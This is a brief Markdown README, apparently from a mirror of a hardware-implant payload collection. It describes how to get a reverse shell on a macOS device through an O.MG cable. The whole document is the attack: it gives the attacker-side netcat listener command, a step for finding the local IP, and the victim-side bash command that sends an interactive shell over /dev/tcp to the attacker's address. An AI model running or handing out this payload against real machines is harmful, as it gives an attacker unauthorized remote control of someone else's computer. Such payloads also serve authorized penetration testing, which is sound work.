mirror of https://github.com/hak5/omg-payloads.git
18 lines
737 B
Markdown
18 lines
737 B
Markdown
|
# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon
|
||
|
# but that is a wet dream atm.
|
||
|
|
||
|
# FIRST STEP(s):
|
||
|
# run "nc -l <any port>" on the attackers machine
|
||
|
# This initialzes your computers listening protocol to look for TCP connections
|
||
|
**IMPORTANT**
|
||
|
# open another Terminal window and run "ipconfig getifaddr en0" to obtain your computers local ip (this is important for the next step)
|
||
|
|
||
|
# NEXT STEP:
|
||
|
# Then simply run the script in your O.MG UI when the cable is connected
|
||
|
|
||
|
# An example of the code run on the attackers computer:
|
||
|
nc -l 80
|
||
|
|
||
|
# An example of the code run on the victims computer:
|
||
|
bash -i >& /dev/tcp/10.0.0.1/80 0>&1
|